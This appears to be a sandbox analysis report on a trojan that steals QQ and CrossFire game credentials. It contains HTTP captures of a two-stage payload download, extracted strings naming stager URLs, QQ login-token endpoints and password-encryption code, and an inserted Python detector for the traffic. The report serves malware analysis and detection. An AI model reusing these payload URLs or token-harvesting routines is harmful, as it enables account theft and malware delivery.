P.E.d......u..E......E...........P..............E.....V.E......#......
...M.d......Y^..]...............U....u.3.]....P...@..u.VWj.j. .PSj.h..
.....@....3..G...............Q. J.....D?.Pj.V.Ht........H...@..u.WV .P
Sj.h.......@...}.Vh.t............t.V..M....._.....^]................U.
.QW....u._..].SVW..$A..j.j.j.j...SWj.h......@B...E.@P.}I.........u.^[_
..]..E.j.j.PVSWj.h......@B....0....P..I...@..u..]. ...V.......V..L....
...3.9A.^[..._..].U..Q..V.7.A....;.tI.~..S.^.|4..;.u.......E......<<< skipped >>>
GET /blog/static/26993501420171281319931/ HTTP/1.1
Accept: */*
Referer: hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: baike2016.blog.163.com
Cache-Control: no-cache
Cookie: usertrack=c+5+hViq4Mw0u352A5GUAg==
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 20 Feb 2017 12:28:02 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=85B5D9A5C526191EBDD8CCAEC2B1FA2D.yqblog18-8010; Domain=.blog.163.com; Path=/

b49
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="content-type" content="text/html;charset=gbk"/>
<meta http-equiv="content-style-type" content="text/css"/>
<meta http-equiv="content-script-type" content="text/javascript"/>
<meta name="version" content="neblog-1.0"/>
<script type="text/javascript">
document.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=location.hash);
document.domain = location.hostname.replace(/^.*\.([\w]+\.[\w]+)$/,'$1');
window.focus();
window.getMusicTimeStamp=function(){return 'e77dd8d44dbf016978cef8c076feb15e';};
//BLOG-647:....OS..............................
(function(){
window.setTimeout(function(){
var _loginUserIcon = document.getElementById('loginUserIcon');
var _rsavatarimg = document.getElementById('rsavatarimg');
if(!!_loginUserIcon){
var _loaded1 = false;
var _img1 = new Image();
_img1.onload = function(){
_loaded1 = true;
_img1.onload = null;
};
_img1.src = _loginUserIcon.src;
window.setTimeout(function(){
if(!_loaded1){
<<< skipped >>>
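The captures above show a two-stage fetch with a fixed User-Agent (MyAppByMulinB): the 40-byte body of 33.txt is nothing but the URL of 01.txt, and 01.txt is a PE image (MZ header, UPX0/UPX1 sections) served as text/plain, which is what the ET "claims to send a Text File" rule keys on. The Python below is an added example, not code from the report or the analysis system, that reproduces that check offline: it splits a raw response, validates the MZ/PE header far enough to read the section names (stopping cleanly on a truncated capture), and flags a PE under a non-application Content-Type, a UPX-packed PE, and a text/plain body that is a bare URL. The two sample responses and the minimal PE header are constructed here; the header carries no code and is not the real payload.

```python
import re
import struct

# User-Agent used by the stager requests captured above (constant taken from the report).
STAGER_UA = "MyAppByMulinB"


def split_response(raw):
    """Split a raw HTTP response into (status line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().decode("latin-1").lower()] = v.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def pe_section_names(body):
    """Return the section names if body starts with a valid MZ/PE header, else None.
    Walks e_lfanew -> 'PE\\0\\0' -> NumberOfSections / SizeOfOptionalHeader -> section
    table, and stops early if the capture is truncated."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (nsec,) = struct.unpack_from("<H", body, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", body, e_lfanew + 20)
    off = e_lfanew + 24 + opt_size
    names = []
    for _ in range(nsec):
        if off + 40 > len(body):
            break                      # truncated capture: report what is there
        names.append(body[off:off + 8].rstrip(b"\0").decode("latin-1"))
        off += 40
    return names


def classify(raw_response, request_ua=None):
    """Return the list of findings for one request/response pair."""
    findings = []
    if request_ua == STAGER_UA:
        findings.append("known stager User-Agent")
    _, hdrs, body = split_response(raw_response)
    ctype = hdrs.get("content-type", "")
    sections = pe_section_names(body)
    if sections is not None:
        if not ctype.startswith("application/"):
            findings.append(f"PE served as {ctype or 'no content-type'}")
        if any(s.startswith("UPX") for s in sections):
            findings.append("UPX-packed PE")
    elif ctype.startswith("text/plain") and re.fullmatch(rb"https?://\S+", body.strip()):
        findings.append("text body is a single URL (next-stage pointer)")
    return findings


def fake_upx_pe():
    """Constructed 208-byte MZ/PE header with UPX0/UPX1/.rsrc entries (no code, not the real payload)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF: Machine, NumberOfSections=3, timestamp, symtab, nsyms, SizeOfOptionalHeader=0, Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0, 0x102)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in (b"UPX0", b"UPX1", b".rsrc"))
    return dos + coff + sections


# Constructed responses mirroring the captured exchange: the 40-byte 33.txt body is a URL,
# and 01.txt is a PE sent with Content-Type: text/plain.
STAGE1 = (b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\nContent-Length: 40\r\n\r\n"
          b"http://xzdownad.zglhsw.com/adpub//01.txt")
STAGE2 = b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n" + fake_upx_pe()

if __name__ == "__main__":
    for label, resp in (("33.txt", STAGE1), ("01.txt", STAGE2)):
        print(label, classify(resp, STAGER_UA))
```

Matching on the MZ/PE structure rather than on the two magic bytes alone keeps the check from firing on text that merely begins with "MZ", and reading the section names gives the same packer hint the IDS rules used without needing the full 502 KB body.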
The Trojan connects to the servers at the following location(s):
(none listed by the analysis system; the entries below are strings extracted from the sample: PE section names, imported DLLs and APIs, embedded QQ/CrossFire login URLs, and fragments of the QQ web-login encryption JavaScript the binary carries)
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
Bv=kAv.SCv
gdiplus.dll
user32.dll
kernel32.dll
ntdll.dll
Kernel32.dll
GdiPlus.dll
wininet.dll
User32.dll
shell32.dll
ole32.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
gdi32.dll
Gdi32.dll
imm32.dll
atl.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
MsgWaitForMultipleObjects
GetProcessHeap
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ShellExecuteA
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
?kernel32.dll
ptlogin2
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
skey=
hXXp://
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
-URL:
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
MsgBox
SysShadow.SubWnd
[VVV.111Ttt.com]
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0&regmaster=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i += 16) {function core_hmac_md5(key, data) {var bkey = str2binl(key);
if (bkey.length > 16) {bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
return core_md5(opad.concat(hash), 512 + 128)
for (var i = 0; i < str.length * chrsz; i += chrsz) {bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i += chrsz) {str += String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i++) {str += hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 + 4)) & 15) + hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i += 3) {if (i * 8 + j * 6 > binarray.length * 32) {str += tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i + 2) {arr.push('\\x' + str.substr(i, 2))arr = arr.join('');function getEncryption(password, salt, vcode, isMd5) {password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000' + vcode.length.toString(16);
while (rsaH1Len.length < 4) {TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len + rsaH1 + TEA.strToBytes(salt) + vcodeLen + hexVcode);
TEA.initkey('');return saltPwd.replace(/[\/\+=]/g,
'/': '-',
'+': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {var str1 = isMd5 ? password: md5(password);
var str2 = str1 + vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {while (z + aD < aC.length) {t += aC.substring(z, z + aD) + '\n';
return t + aC.substring(z, aC.length)
return '0' + t.toString(16)
return t.toString(16)
if (aG < aD.length + 11) {var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {uv_alert('Invalid RSA public key')return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength() + 7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {if (aE + aD > this.DB) {this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t++] = (t >> (this.DB - aE))
if (aE >= this.DB) {aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-' + this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {aH |= this[--aD] >> (aG = this.DB - aC)
aG = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1) + l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC++] = aE & this.DM;
aE >>= this.DB
aD[aC++] = aE & this.DM;
aE >>= this.DB
aD[aC++] = this.DV + aE
var t = this.abs(),
aE = z.abs();
aD[aC + t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z + t.t] = t.am(z + 1, 2 * t[z], aC, 2 * z + 1, aD, t.t - z - 1)) >= t.DV) {aC[z + t.t] -= t.DV;
aC[aC.t - 1] = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT + (aG[aO - 1] + aR) * aS);
if ((aG[aO] = aE.am(0, aD, aG, aN, 0, aM)) < aD) {aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {var H = window.crypto.random(32);
for (K = 0; K < H.length; K) {W[ae ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length; ae) {return o.next()
for (t = 0; t < z.length; t) {af.prototype.nextBytes = ax;
z = (z this.S[aD] aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B ) {var C = Number(D[B]).toString(16);
if (C.length == 1) {for (var A = 0; A < B.length; A = 2) {C = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A ) {B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C ) {var A = u.length;
for (var B = 0; B < E.length; B ) {C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B = 2) {C[A ] = parseInt(E.substr(B, 2), 16)
s.TEA = {for (var B = 0; B < C.length; B ) {A = String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {var A = C.charCodeAt(B);
d.encode = function(E) {if (arguments.length != 1) {var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) B B);
A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) G.charAt((H >> 6) & 63) B);
return A.join('')if (!window.btoa) {window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x' hex.substr(j, 2))var result = arr.join('');hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000' c.length.toString(16);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len rsaH1 s.TEA.strToBytes(salt) vcodeLen hexVcode);
s.TEA.initkey('');%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
@1970-01-01 08:00:00
\exdui.dll
\dwmapi.dll
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
CDKEY
CDKEY:
02/24/16
V2.6.0
\CF_data.ini
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>
01/04/17
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
pt_mbkey
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=
&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
